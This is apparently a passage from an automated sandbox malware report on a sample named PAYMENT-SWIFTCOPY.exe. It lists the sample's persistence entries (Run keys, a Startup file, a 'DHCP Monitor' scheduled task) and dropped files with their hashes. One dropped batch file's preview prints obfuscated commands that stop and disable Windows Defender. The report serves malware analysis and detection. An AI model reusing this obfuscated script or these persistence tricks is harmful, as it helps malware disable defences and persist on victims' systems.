                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/509580/sample/PAYMENT-SWIFTCOPY.exe

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            17:34:21API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                            17:34:36AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                            17:34:38API Interceptor441x Sleep call for process: powershell.exe modified
                                                                                            17:34:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\Cursors\\svchost.exe
                                                                                            17:35:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\Cursors\\svchost.exe
                                                                                            17:35:14API Interceptor423x Sleep call for process: RegSvcs.exe modified
                                                                                            17:35:14AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                            17:35:15Task SchedulerRun new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" s>$(Arg0)
                                                                                            17:35:15Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                                                                                            17:35:27API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                            17:35:39API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            No context

                                                                                            Domains

                                                                                            No context

                                                                                            ASN

                                                                                            No context

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:MPEG-4 LOAS
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.24857625712518605
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4r:BJiRdwfu2SRU4r
                                                                                            MD5:3FC5119C142E58ED35F7CCC71C2D6BFC
                                                                                            SHA1:20E3D684D94C0EE9B1D11C49A30F7F60776E6B88
                                                                                            SHA-256:4D5FE401A7A47F8C102A5DFF16A5C4F1086EC14B2A2E3E8E9AF0712491306585
                                                                                            SHA-512:207DF8144FFD0793784222E519844929B21AD717FF64DF311306FC28F4E8C589DEE1D2CA4F84BEB18D79BAECD961D29B56D0C6998A42880D8817BB8B9EDD2E6A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x05a0edbd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):786432
                                                                                            Entropy (8bit):0.2505996464307009
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:tDG+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
                                                                                            MD5:7D89FC10E64D7AC517C7FA3F9341E827
                                                                                            SHA1:D543EE1D6AECA32863B84CFDFF80E7895965322B
                                                                                            SHA-256:8D586BD68AB567F00AB94B20B856EEA5634AF3B8162FE187CCFE69A5AA53EE7F
                                                                                            SHA-512:1C456D11349ED29B0776AC408B0CFE765950576389FD7A1EA54C22F356AC4B1456E3B16D61D04B0083F07047CF8DB85659D2B9B31071D389DA81B9B1E550B122
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ...... ................e.f.3...w........................&..........w..."...y}.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................|.."...y...................)."...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.07383530628626274
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:b/9EvzE0/t7l/bJdAti7q+vlllAll3Vkttlmlnl:bA9l7t4o9llA3
                                                                                            MD5:7C4FC2AB11C11AA6A1A4C8A67C197C65
                                                                                            SHA1:013B33DEB7889B4C23A19AAD67DF79836057E6E4
                                                                                            SHA-256:C39F5DF3E02834F12D18DEA92AA500D2CF720F147CCF653A7279B65827BEABC0
                                                                                            SHA-512:354D40BA0E8139B8E2E51DF1F11658738A35389A01B69EE97C1C1BAB4D8ABE4163F73B8C837901A8AA5741A51C113DB5DEE739FCFC2332B0D95EC7D0C7073384
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: ........................................3...w..."...y.......w...............w.......w....:O.....w....................)."...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unknown
                                                                                            Category:dropped
                                                                                            Size (bytes):14734
                                                                                            Entropy (8bit):4.993014478972177
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                            MD5:8D5E194411E038C060288366D6766D3D
                                                                                            SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                            SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                            SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):0
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4tL6EvQ4RJUwtbCzRncSBKnMjultIS8tpEQeZU71u16z25maxHVQ3C0KjKIvUI+w:aJUIcc4KMCltInEp+32UCGCBWlG
                                                                                            MD5:67CCF41BE96EE20A720CD755F8868A86
                                                                                            SHA1:E978B6EB4286B80DE5579483EF687521130060B9
                                                                                            SHA-256:A7D2A39FE97C370EC5F967EED3F26CA9968B634060414494D9A4856946F35225
                                                                                            SHA-512:32B17295DC39B1B8EE8BBE14E91DE25C454C834D8BC0423444EE95E7D153168FAB60A4F5E3CB746F612B075444DD1DB514FCF897819687E31A4F4093404559D0
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: @...e...................m.N...........-.#.T..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)K.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                            C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe
                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):91000
                                                                                            Entropy (8bit):6.241345766746317
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\test.bat
                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe
                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8399
                                                                                            Entropy (8bit):4.665734428420432
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jrbbdut.2iv.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):0
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dl3mfv0.mjf.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unknown
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3awsi4vf.nab.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):0
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4occ01qr.m5u.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bll5fpgt.kgy.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unknown
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbudpifq.juk.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fg5bmw3u.agw.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fthb5lxg.olj.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhqi51fr.ens.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lydjbka0.mfo.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2gxdlgx.ggb.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phoceqgb.b3p.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdlylvgp.i2g.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thupysz4.dvo.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z3yhf1ll.jug.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe
                                                                                            Process:C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):91000
                                                                                            Entropy (8bit):6.241345766746317
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
